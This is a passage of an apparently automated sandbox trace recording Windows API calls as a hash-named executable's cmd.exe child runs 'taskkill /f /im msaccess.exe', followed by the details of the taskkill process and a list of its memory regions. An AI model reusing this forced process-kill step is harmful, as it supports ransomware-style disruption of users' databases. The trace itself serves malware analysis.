_wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0208.085] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0208.085] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0208.085] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0208.085] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0208.085] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0208.086] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0208.086] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0208.086] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0208.086] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0208.086] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0208.086] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0208.086] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0208.086] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0208.086] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0208.086] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0208.086] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0208.086] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0208.086] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0208.086] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0208.086] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0208.086] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0208.086] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0208.086] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0208.086] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0208.086] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0208.086] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0208.086] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0208.086] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0208.086] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0208.087] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0208.087] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0208.087] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0208.087] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0208.087] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0208.087] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0208.087] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0208.087] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0208.087] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0208.087] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0208.087] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0208.087] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0208.087] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0208.087] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0208.087] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0208.087] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0208.087] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0208.087] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0208.087] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0208.087] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0208.087] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0208.087] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0208.087] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0208.087] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0208.088] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0208.088] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0208.088] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0208.088] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0208.088] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0208.088] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0208.088] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0208.088] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0208.088] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0208.088] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0208.088] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0208.088] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0208.088] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0208.088] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0208.088] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0208.088] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0208.088] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0208.089] GetProcessHeap () returned 0x470000 [0208.089] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x210) returned 0x47ad28 [0208.089] GetProcessHeap () returned 0x470000 [0208.089] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x46) returned 0x47af40 [0208.089] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0208.089] GetProcessHeap () returned 0x470000 [0208.089] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x418) returned 0x4705c8 [0208.089] SetErrorMode (uMode=0x0) returned 0x8003 [0208.089] SetErrorMode (uMode=0x1) returned 0x0 [0208.089] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4705d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0208.089] SetErrorMode (uMode=0x8003) returned 0x1 [0208.089] GetProcessHeap () returned 0x470000 [0208.089] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4705c8, Size=0x56) returned 0x4705c8 [0208.090] GetProcessHeap () returned 0x470000 [0208.090] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x4705c8) returned 0x56 [0208.090] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0208.090] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0208.090] GetProcessHeap () returned 0x470000 [0208.090] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x110) returned 0x47af90 [0208.090] GetProcessHeap () returned 0x470000 [0208.090] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x218) returned 0x470628 [0208.095] GetProcessHeap () returned 0x470000 [0208.095] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x470628, Size=0x112) returned 0x470628 [0208.095] GetProcessHeap () returned 0x470000 [0208.095] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x470628) returned 0x112 [0208.095] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0208.095] GetProcessHeap () returned 0x470000 [0208.095] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe0) returned 0x47b0a8 [0208.098] GetProcessHeap () returned 0x470000 [0208.098] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x47b0a8, Size=0x76) returned 0x47b0a8 [0208.098] GetProcessHeap () returned 0x470000 [0208.098] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x47b0a8) returned 0x76 [0208.098] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.098] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0208.099] GetLastError () returned 0x2 [0208.099] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.099] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x47b128 [0208.099] GetProcessHeap () returned 0x470000 [0208.099] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x477508 [0208.099] FindClose (in: hFindFile=0x47b128 | out: hFindFile=0x47b128) returned 1 [0208.100] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0208.100] GetLastError () returned 0x2 [0208.100] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x47b128 [0208.100] GetProcessHeap () returned 0x470000 [0208.100] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x477508, Size=0x4) returned 0x470598 [0208.100] FindClose (in: hFindFile=0x47b128 | out: hFindFile=0x47b128) returned 1 [0208.100] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0208.100] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0208.100] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0208.103] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0208.103] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0208.103] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x140, hStdOutput=0x144, hStdError=0x154)) [0208.103] GetProcessHeap () returned 0x470000 [0208.103] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x18) returned 0x477508 [0208.103] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0208.103] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0208.103] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0208.104] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0208.105] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0208.105] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0208.105] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0208.105] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0208.105] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0208.105] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0208.105] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0208.105] GetProcessHeap () returned 0x470000 [0208.105] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x477508) returned 1 [0208.105] GetProcessHeap () returned 0x470000 [0208.105] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa) returned 0x47b128 [0208.105] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0208.110] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im msaccess.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im msaccess.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im msaccess.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x86c, dwThreadId=0x6dc)) returned 1 [0208.143] CloseHandle (hObject=0x98) returned 1 [0208.143] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0208.143] GetProcessHeap () returned 0x470000 [0208.144] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x479d98) returned 1 [0208.144] GetEnvironmentStringsW () returned 0x479d98* [0208.144] GetProcessHeap () returned 0x470000 [0208.144] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa76) returned 0x477d08 [0208.144] FreeEnvironmentStringsA (penv="=") returned 1 [0208.144] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0209.494] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0209.495] CloseHandle (hObject=0x9c) returned 1 [0209.495] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0209.496] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0209.496] GetProcessHeap () returned 0x470000 [0209.497] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x477d08) returned 1 [0209.497] GetEnvironmentStringsW () returned 0x47b158* [0209.497] GetProcessHeap () returned 0x470000 [0209.497] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa9c) returned 0x477d08 [0209.498] FreeEnvironmentStringsA (penv="=") returned 1 [0209.498] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0209.498] GetProcessHeap () returned 0x470000 [0209.498] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x477d08) returned 1 [0209.498] GetEnvironmentStringsW () returned 0x47b158* [0209.498] GetProcessHeap () returned 0x470000 [0209.498] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa9c) returned 0x477d08 [0209.498] FreeEnvironmentStringsA (penv="=") returned 1 [0209.498] GetProcessHeap () returned 0x470000 [0209.498] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47b128) returned 1 [0209.498] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0209.498] _get_osfhandle (_FileHandle=1) returned 0x144 [0209.498] SetConsoleMode (hConsoleHandle=0x144, dwMode=0x0) returned 0 [0209.499] _get_osfhandle (_FileHandle=1) returned 0x144 [0209.499] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0209.499] _get_osfhandle (_FileHandle=0) returned 0x140 [0209.499] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0209.499] GetConsoleOutputCP () returned 0x1b5 [0209.500] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0209.500] SetThreadUILanguage (LangId=0x0) returned 0x409 [0209.503] exit (_Code=128) Thread: id = 333 os_tid = 0x754 Process: id = "62" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x2efff000" os_pid = "0x86c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "61" os_parent_pid = "0xc44" cmd_line = "taskkill /f /im msaccess.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4545 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4546 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4547 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4548 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 4549 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 4550 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 4551 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 4552 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 4553 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 4554 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 4555 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 4556 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4557 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4558 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4559 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4560 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 4561 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4562 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 4563 start_va = 0x4590000 end_va = 0x459ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 4564 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4565 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4566 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4567 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4568 start_va = 0x45a0000 end_va = 0x477ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045a0000" filename = "" Region: id = 4569 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4570 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4571 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4572 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4573 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4574 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4575 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4576 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4577 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 4578 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 4579 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4580 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4581 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4582 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4583 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 4584 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4585 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 4586 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4587 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 4588 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 4589 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = 